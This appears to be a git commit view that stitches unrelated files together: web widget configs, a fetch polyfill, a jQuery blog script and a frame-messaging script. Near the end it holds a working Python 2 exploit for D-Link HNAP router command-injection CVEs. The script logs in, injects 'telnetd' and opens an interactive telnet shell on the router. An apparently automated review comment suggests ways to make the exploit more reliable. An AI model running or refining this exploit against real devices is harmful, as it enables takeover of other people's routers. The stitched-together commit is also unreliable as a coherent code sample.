Commit 69cbd3f3 by yinqidi

experiment

parent 9ddf17a9
_ate.track.config_resp({"pc":"esb","tool-config":{"_default":{"widgets":{"h35n":{"hideEmailSharingConfirmation":false,"numPreferredServices":5,"widgetId":"h35n","creationTimestamp":1548498783649,"hideDevice":"none","position":"bottom-right","services":"twitter,linkedin,facebook,email,link,whatsapp","id":"esb","__hideOnHomepage":false,"hideLabel":false}}}},"subscription":{"active":true,"edition":"BASIC","tier":"basic","reducedBranding":false,"insightsEnabled":false},"customMessageTemplates":[],"pro-config":{"_default":{"widgets":{"esb":{"hideEmailSharingConfirmation":false,"numPreferredServices":5,"widgetId":"h35n","creationTimestamp":1548498783649,"hideDevice":"none","position":"bottom-right","services":"twitter,linkedin,facebook,email,link,whatsapp","id":"esb","__hideOnHomepage":false,"hideLabel":false}}}}});
\ No newline at end of file
addthis.cbs.jsonp__287360183835307040({"loc":"MDAwMDBBU0pQMTMyMTU3MzE5ODAwMTAwMDBDSA==","pixels":[]});
\ No newline at end of file
atwpjp([151],{256:function(c,l){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M23.476 20.663c0-.324-.114-.6-.34-.825l-2.524-2.524a1.124 1.124 0 0 0-.826-.34c-.34 0-.63.13-.873.388.024.024.1.1.23.225s.217.212.26.26c.046.05.106.126.183.23a.976.976 0 0 1 .2.644c0 .325-.113.6-.34.827-.226.226-.5.34-.825.34-.12 0-.23-.015-.332-.043a.976.976 0 0 1-.31-.158 2.89 2.89 0 0 1-.23-.182 7.506 7.506 0 0 1-.26-.26l-.226-.23c-.267.25-.4.545-.4.885 0 .322.113.597.34.824l2.5 2.512c.218.218.493.328.825.328.323 0 .598-.106.825-.316l1.784-1.772a1.11 1.11 0 0 0 .34-.813zm-8.532-8.556c0-.323-.113-.598-.34-.825l-2.5-2.512a1.124 1.124 0 0 0-.825-.34c-.316 0-.59.11-.826.328L8.67 10.53a1.11 1.11 0 0 0-.34.813c0 .323.113.598.34.825l2.524 2.524c.22.22.494.328.825.328.34 0 .63-.126.873-.376-.024-.025-.1-.1-.23-.225a7.506 7.506 0 0 1-.26-.262 2.89 2.89 0 0 1-.183-.23.976.976 0 0 1-.2-.644c0-.323.113-.598.34-.825.226-.227.5-.34.824-.34a.976.976 0 0 1 .643.2c.106.077.183.137.23.182.05.044.137.13.262.26s.2.207.224.23c.267-.25.4-.545.4-.885zm10.862 8.556c0 .97-.344 1.792-1.032 2.464L22.99 24.9c-.67.67-1.492 1.006-2.463 1.006-.98 0-1.805-.344-2.476-1.032l-2.5-2.512c-.67-.67-1.006-1.493-1.006-2.463 0-.997.356-1.842 1.068-2.538l-1.068-1.068c-.696.712-1.538 1.068-2.525 1.068-.97 0-1.797-.34-2.476-1.02L7.02 13.82C6.34 13.138 6 12.314 6 11.343c0-.97.344-1.792 1.032-2.464l1.784-1.773c.67-.67 1.492-1.007 2.463-1.007.978 0 1.803.344 2.475 1.032l2.5 2.512c.67.67 1.007 1.492 1.007 2.463 0 .995-.356 1.84-1.068 2.537l1.068 1.068c.696-.712 1.537-1.068 2.524-1.068.97 0 1.797.34 2.476 1.02l2.524 2.523c.68.68 1.02 1.505 1.02 2.476z" fill-rule="evenodd"/></svg>'}});
atwpjp([151],{256:function(c,l){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M23.476 20.663c0-.324-.114-.6-.34-.825l-2.524-2.524a1.124 1.124 0 0 0-.826-.34c-.34 0-.63.13-.873.388.024.024.1.1.23.225s.217.212.26.26c.046.05.106.126.183.23a.976.976 0 0 1 .2.644c0 .325-.113.6-.34.827-.226.226-.5.34-.825.34-.12 0-.23-.015-.332-.043a.976.976 0 0 1-.31-.158 2.89 2.89 0 0 1-.23-.182 7.506 7.506 0 0 1-.26-.26l-.226-.23c-.267.25-.4.545-.4.885 0 .322.113.597.34.824l2.5 2.512c.218.218.493.328.825.328.323 0 .598-.106.825-.316l1.784-1.772a1.11 1.11 0 0 0 .34-.813zm-8.532-8.556c0-.323-.113-.598-.34-.825l-2.5-2.512a1.124 1.124 0 0 0-.825-.34c-.316 0-.59.11-.826.328L8.67 10.53a1.11 1.11 0 0 0-.34.813c0 .323.113.598.34.825l2.524 2.524c.22.22.494.328.825.328.34 0 .63-.126.873-.376-.024-.025-.1-.1-.23-.225a7.506 7.506 0 0 1-.26-.262 2.89 2.89 0 0 1-.183-.23.976.976 0 0 1-.2-.644c0-.323.113-.598.34-.825.226-.227.5-.34.824-.34a.976.976 0 0 1 .643.2c.106.077.183.137.23.182.05.044.137.13.262.26s.2.207.224.23c.267-.25.4-.545.4-.885zm10.862 8.556c0 .97-.344 1.792-1.032 2.464L22.99 24.9c-.67.67-1.492 1.006-2.463 1.006-.98 0-1.805-.344-2.476-1.032l-2.5-2.512c-.67-.67-1.006-1.493-1.006-2.463 0-.997.356-1.842 1.068-2.538l-1.068-1.068c-.696.712-1.538 1.068-2.525 1.068-.97 0-1.797-.34-2.476-1.02L7.02 13.82C6.34 13.138 6 12.314 6 11.343c0-.97.344-1.792 1.032-2.464l1.784-1.773c.67-.67 1.492-1.007 2.463-1.007.978 0 1.803.344 2.475 1.032l2.5 2.512c.67.67 1.007 1.492 1.007 2.463 0 .995-.356 1.84-1.068 2.537l1.068 1.068c.696-.712 1.537-1.068 2.524-1.068.97 0 1.797.34 2.476 1.02l2.524 2.523c.68.68 1.02 1.505 1.02 2.476z" fill-rule="evenodd"/></svg>'}});
\ No newline at end of file
/*
/*
Copyright (c) 2014-2016 GitHub, Inc.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
(function(self){if(self.fetch)return;function normalizeName(name){if(typeof name!=="string")name=String(name);if(/[^a-z0-9\-#$%&'*+.\^_`|~]/i.test(name))throw new TypeError("Invalid character in header field name");return name.toLowerCase()}function normalizeValue(value){if(typeof value!=="string")value=String(value);return value}function Headers(headers){this.map={};if(headers instanceof Headers)headers.forEach(function(value,name){this.append(name,value)},this);else if(headers)Object.getOwnPropertyNames(headers).forEach(function(name){this.append(name,
headers[name])},this)}Headers.prototype.append=function(name,value){name=normalizeName(name);value=normalizeValue(value);var list=this.map[name];if(!list){list=[];this.map[name]=list}list.push(value)};Headers.prototype["delete"]=function(name){delete this.map[normalizeName(name)]};Headers.prototype.get=function(name){var values=this.map[normalizeName(name)];return values?values[0]:null};Headers.prototype.getAll=function(name){return this.map[normalizeName(name)]||[]};Headers.prototype.has=function(name){return this.map.hasOwnProperty(normalizeName(name))};
Headers.prototype.set=function(name,value){this.map[normalizeName(name)]=[normalizeValue(value)]};Headers.prototype.forEach=function(callback,thisArg){Object.getOwnPropertyNames(this.map).forEach(function(name){this.map[name].forEach(function(value){callback.call(thisArg,value,name,this)},this)},this)};function consumed(body){if(body.bodyUsed)return Promise.reject(new TypeError("Already read"));body.bodyUsed=true}function fileReaderReady(reader){return new Promise(function(resolve,reject){reader.onload=
function(){resolve(reader.result)};reader.onerror=function(){reject(reader.error)}})}function readBlobAsArrayBuffer(blob){var reader=new FileReader;reader.readAsArrayBuffer(blob);return fileReaderReady(reader)}function readBlobAsText(blob){var reader=new FileReader;reader.readAsText(blob);return fileReaderReady(reader)}var support={blob:"FileReader"in self&&"Blob"in self&&function(){try{new Blob;return true}catch(e){return false}}(),formData:"FormData"in self,arrayBuffer:"ArrayBuffer"in self};function Body(){this.bodyUsed=
false;this._initBody=function(body){this._bodyInit=body;if(typeof body==="string")this._bodyText=body;else if(support.blob&&Blob.prototype.isPrototypeOf(body))this._bodyBlob=body;else if(support.formData&&FormData.prototype.isPrototypeOf(body))this._bodyFormData=body;else if(!body)this._bodyText="";else if(support.arrayBuffer&&ArrayBuffer.prototype.isPrototypeOf(body));else throw new Error("unsupported BodyInit type");if(!this.headers.get("content-type"))if(typeof body==="string")this.headers.set("content-type",
"text/plain;charset=UTF-8");else if(this._bodyBlob&&this._bodyBlob.type)this.headers.set("content-type",this._bodyBlob.type)};if(support.blob){this.blob=function(){var rejected=consumed(this);if(rejected)return rejected;if(this._bodyBlob)return Promise.resolve(this._bodyBlob);else if(this._bodyFormData)throw new Error("could not read FormData body as blob");else return Promise.resolve(new Blob([this._bodyText]))};this.arrayBuffer=function(){return this.blob().then(readBlobAsArrayBuffer)};this.text=
function(){var rejected=consumed(this);if(rejected)return rejected;if(this._bodyBlob)return readBlobAsText(this._bodyBlob);else if(this._bodyFormData)throw new Error("could not read FormData body as text");else return Promise.resolve(this._bodyText)}}else this.text=function(){var rejected=consumed(this);return rejected?rejected:Promise.resolve(this._bodyText)};if(support.formData)this.formData=function(){return this.text().then(decode)};this.json=function(){return this.text().then(JSON.parse)};return this}
var methods=["DELETE","GET","HEAD","OPTIONS","POST","PUT"];function normalizeMethod(method){var upcased=method.toUpperCase();return methods.indexOf(upcased)>-1?upcased:method}function Request(input,options){options=options||{};var body=options.body;if(Request.prototype.isPrototypeOf(input)){if(input.bodyUsed)throw new TypeError("Already read");this.url=input.url;this.credentials=input.credentials;if(!options.headers)this.headers=new Headers(input.headers);this.method=input.method;this.mode=input.mode;
if(!body){body=input._bodyInit;input.bodyUsed=true}}else this.url=input;this.credentials=options.credentials||this.credentials||"omit";if(options.headers||!this.headers)this.headers=new Headers(options.headers);this.method=normalizeMethod(options.method||this.method||"GET");this.mode=options.mode||this.mode||null;this.referrer=null;if((this.method==="GET"||this.method==="HEAD")&&body)throw new TypeError("Body not allowed for GET or HEAD requests");this._initBody(body)}Request.prototype.clone=function(){return new Request(this)};
function decode(body){var form=new FormData;body.trim().split("&").forEach(function(bytes){if(bytes){var split=bytes.split("=");var name=split.shift().replace(/\+/g," ");var value=split.join("=").replace(/\+/g," ");form.append(decodeURIComponent(name),decodeURIComponent(value))}});return form}function headers(xhr){var head=new Headers;var pairs=xhr.getAllResponseHeaders().trim().split("\n");pairs.forEach(function(header){var split=header.trim().split(":");var key=split.shift().trim();var value=split.join(":").trim();
head.append(key,value)});return head}Body.call(Request.prototype);function Response(bodyInit,options){if(!options)options={};this.type="default";this.status=options.status;this.ok=this.status>=200&&this.status<300;this.statusText=options.statusText;this.headers=options.headers instanceof Headers?options.headers:new Headers(options.headers);this.url=options.url||"";this._initBody(bodyInit)}Body.call(Response.prototype);Response.prototype.clone=function(){return new Response(this._bodyInit,{status:this.status,
statusText:this.statusText,headers:new Headers(this.headers),url:this.url})};Response.error=function(){var response=new Response(null,{status:0,statusText:""});response.type="error";return response};var redirectStatuses=[301,302,303,307,308];Response.redirect=function(url,status){if(redirectStatuses.indexOf(status)===-1)throw new RangeError("Invalid status code");return new Response(null,{status:status,headers:{location:url}})};self.Headers=Headers;self.Request=Request;self.Response=Response;self.fetch=
function(input,init){return new Promise(function(resolve,reject){var request;if(Request.prototype.isPrototypeOf(input)&&!init)request=input;else request=new Request(input,init);var xhr=new XMLHttpRequest;function responseURL(){if("responseURL"in xhr)return xhr.responseURL;if(/^X-Request-URL:/m.test(xhr.getAllResponseHeaders()))return xhr.getResponseHeader("X-Request-URL");return}xhr.onload=function(){var status=xhr.status===1223?204:xhr.status;if(status<100||status>599){reject(new TypeError("Network request failed"));
return}var options={status:status,statusText:xhr.statusText,headers:headers(xhr),url:responseURL()};var body="response"in xhr?xhr.response:xhr.responseText;resolve(new Response(body,options))};xhr.onerror=function(){reject(new TypeError("Network request failed"))};xhr.open(request.method,request.url,true);if(request.credentials==="include")xhr.withCredentials=true;if("responseType"in xhr&&support.blob)xhr.responseType="blob";request.headers.forEach(function(value,name){xhr.setRequestHeader(name,value)});
xhr.send(typeof request._bodyInit==="undefined"?null:request._bodyInit)})};self.fetch.polyfill=true})(typeof self!=="undefined"?self:this);
$(document).ready(function () {
$(document).ready(function () {
$('a.blog-button').click(function (e) {
if ($('.panel-cover').hasClass('panel-cover--collapsed')) return
currentWidth = $('.panel-cover').width()
if (currentWidth < 960) {
$('.panel-cover').addClass('panel-cover--collapsed')
$('.content-wrapper').addClass('animated slideInRight')
} else {
$('.panel-cover').css('max-width', currentWidth)
$('.panel-cover').animate({'max-width': '530px', 'width': '40%'}, 400, swing = 'swing', function () {})
}
})
if (window.location.hash && window.location.hash == '#blog') {
$('.panel-cover').addClass('panel-cover--collapsed')
}
if (window.location.pathname !== '/' && window.location.pathname !== '/index.html') {
$('.panel-cover').addClass('panel-cover--collapsed')
}
$('.btn-mobile-menu').click(function () {
$('.navigation-wrapper').toggleClass('visible animated bounceInDown')
$('.btn-mobile-menu__icon').toggleClass('icon-list icon-x-circle animated fadeIn')
})
$('.navigation-wrapper .blog-button').click(function () {
$('.navigation-wrapper').toggleClass('visible')
$('.btn-mobile-menu__icon').toggleClass('icon-list icon-x-circle animated fadeIn')
})
})
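Review bot: `currentWidth = $('.panel-cover').width()` in the click handler and the `swing = 'swing'` argument passed to `.animate(...)` both assign without a declaration, so they create implicit globals on `window` (and throw a ReferenceError if this file is ever loaded in strict mode). Declare the first with `var currentWidth = $('.panel-cover').width()` and pass the easing as a plain string, `$('.panel-cover').animate({'max-width': '530px', 'width': '40%'}, 400, 'swing', function () {})`. The file also appears to open `$(document).ready(function () {` twice with only one closing `})`; that may be a rendering artifact of the commit view, but it is worth confirming the committed file parses.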
/*Copyright (c) 2011, 2019, Oracle and/or its affiliates. All rights reserved.*/
/*Copyright (c) 2011, 2019, Oracle and/or its affiliates. All rights reserved.*/
(function(){try{var l=function(b){var a=!0;try{b.domain}catch(f){a=!1}return a},r=function(b){return b.replace(/:/g,"%3A").replace(/=/g,"%3D").replace(/,/g,"%2C")},q=function(b){try{var a;var f=b.data;if("string"!==typeof f)a=!1;else{var c=f.match(new RegExp("([a-z]+)"+d+"([a-z0-9.-]+)"+d+"([0-9]+)"+d+"([a-z]+)"+d+"([0-9]+)"+d+"(.+)","i"));a=c&&7===c.length&&c[1]===m&&c[2]===n&&-1!==c[6].indexOf("check")?!0:!1}if(a){var p;var h=window.top&&window.top.location&&window.top.location.href;p=h&&("string"!==
typeof h?0:/^(?:https?:\/\/)?[^.:\/]+(?:\.[^.:\/]+)/.test(h))?h:!1;if(p){var t,e=window.top.location.hostname.replace("www.","")+window.top.location.pathname;"string"===typeof e&&"/"===e.charAt(e.length-1)&&(e=e.substr(0,e.length-1));if(t=e){var g=JSON.stringify({available:!1,fullUrl:r(p),cleanUrl:r(t),urlSrc:5}),g=g.replace(/"(\w+)"\s*:/g,"$1:"),l=b.data.split(d),q=[m,n,k,u,l[4]||k+1,g].join(d);b.source.postMessage(q,"*")}}}}catch(v){}},v=function(b,a){function f(c,b){var a=[];c&&a.push(c);b=b||
0;if(10<b||!c||!c.frames)return a;var d;try{d=isNaN(c.frames.length)?100:c.frames.length}catch(g){d=100}for(var e=0;e<d;e++)try{try{if(void 0==c.frames[e])break}catch(g){break}a=a.concat(f(c.frames[e],b+1))}catch(g){break}return a}return f(b,a)},w=function(){for(var b=[m,n,k,u,k+1,"ping"].join(d),a=v(window.top),f=0;f<a.length;f++)a[f]!==window.top&&a[f].postMessage(b,"*")},d="#",m="MSFAPI",n="1.2",u="addThis",k=Math.floor(Math.random()*Math.pow(10,12));window&&window.top&&l(window.top)&&!0!==window.top["__@@##MUH"]&&
(window.top.addEventListener("message",q),window.top["__@@##MUH"]=!0,w())}catch(b){}})();
import requests
import telnetlib
from hashlib import md5
import time
import math
trans_5C = "".join(chr(x ^ 0x5c) for x in xrange(256))
trans_36 = "".join(chr(x ^ 0x36) for x in xrange(256))
blocksize = md5().block_size
def hmac_md5(key, msg):
if len(key) > blocksize:
key = md5(key).digest()
key += chr(0) * (blocksize - len(key))
o_key_pad = key.translate(trans_5C)
i_key_pad = key.translate(trans_36)
return md5(o_key_pad + md5(i_key_pad + msg).digest())
def HNAP_AUTH(SOAPAction, privateKey):
b = math.floor(int(time.time())) % 2000000000
b = str(b)[:-2]
h = hmac_md5(privateKey, b + '"http://purenetworks.com/HNAP1/' + SOAPAction + '"').hexdigest().upper()
return h + " " + b
poc_list = [['1', 'CVE-2018-19986', '/HNAP1/SetRouterSettings'],
['2', 'CVE-2018-19987', '/HNAP1/SetAccessPointMode'],
['3', 'CVE-2018-19988_1', '/HNAP1/SetClientInfoDemo'],
['4', 'CVE-2018-19988_2', '/HNAP1/SetClientInfoDemo'],
['5', 'CVE-2018-19989', '/HNAP1/SetQoSSettings'],
['6', 'CVE-2018-19990', '/HNAP1/SetWiFiVerifyAlpha']]
for i in poc_list:
print(i)
n = int(raw_input("select payload>>"))
poc = poc_list[n-1]
IP = raw_input("IP>>")
adminPw = raw_input("pw>>")
command = "telnetd" # command injection id
headers = requests.utils.default_headers()
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"] = '"http://purenetworks.com/HNAP1/Login"'
headers["Origin"] = "http://" + IP
headers["Referer"] = "http://" + IP + "/info/Login.html"
headers["Content-Type"] = "text/xml; charset=UTF-8"
headers["X-Requested-With"] = "XMLHttpRequest"
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>request</Action><Username>Admin</Username><LoginPassword></LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
data = r.text
challenge = str(data[data.find("<Challenge>") + 11: data.find("</Challenge>")])
cookie = data[data.find("<Cookie>") + 8: data.find("</Cookie>")]
publicKey = str(data[data.find("<PublicKey>") + 11: data.find("</PublicKey>")])
privateKey = hmac_md5(publicKey + adminPw, challenge).hexdigest().upper()
password = hmac_md5(privateKey, challenge).hexdigest().upper()
headers["HNAP_AUTH"] = HNAP_AUTH("Login", privateKey)
headers["Cookie"] = "uid=" + cookie
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>login</Action><Username>Admin</Username><LoginPassword>'+password+'</LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
headers["Origin"] = "http://" + IP
headers["HNAP_AUTH"] = HNAP_AUTH(poc[2].split('/')[-1], privateKey)
headers["SOAPACTION"] = '"http://purenetworks.com{}"'.format(poc[2])
headers["Accept"] = "text/xml"
payload = open('{}.xml'.format(poc[1])).read().replace('ip', IP).replace('COMMAND', command)
print '[*] command injection'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
print(r.text)
print '[*] waiting 30 sec...'
time.sleep(30)
print '[*] enjoy your shell'
telnetlib.Telnet(IP).interact()
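Review bot: The command-injection request is posted without checking that the preceding HNAP login succeeded — the response of the second `requests.post` is assigned to `r` and then discarded — and the `challenge`, `cookie` and `publicKey` slices silently yield garbage when a tag is absent, because `str.find` returns -1 rather than raising. Add a guard after reading the first response, e.g. `if '<Challenge>' not in data or '<PublicKey>' not in data: raise SystemExit('[-] no HNAP challenge in response')`, and an equivalent check on the login reply (HNAP login replies presumably carry a result element — confirm against a real device before relying on its name). Every `requests.post` should also pass `timeout=`, since an unreachable router otherwise hangs the script before it even reaches the 30-second sleep. The hand-rolled `hmac_md5` duplicates the standard library: `import hmac` and `return hmac.new(key, msg, md5)` behave identically and remove the two translation tables. A header comment should state that the script is Python 2 only (`xrange`, `raw_input`, print statements) and that the `CVE-*.xml` payload files it opens must sit beside it.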
https://github.com/pr0v3rbs/CVE
DSL:
https://xz.aliyun.com/t/6607
\ No newline at end of file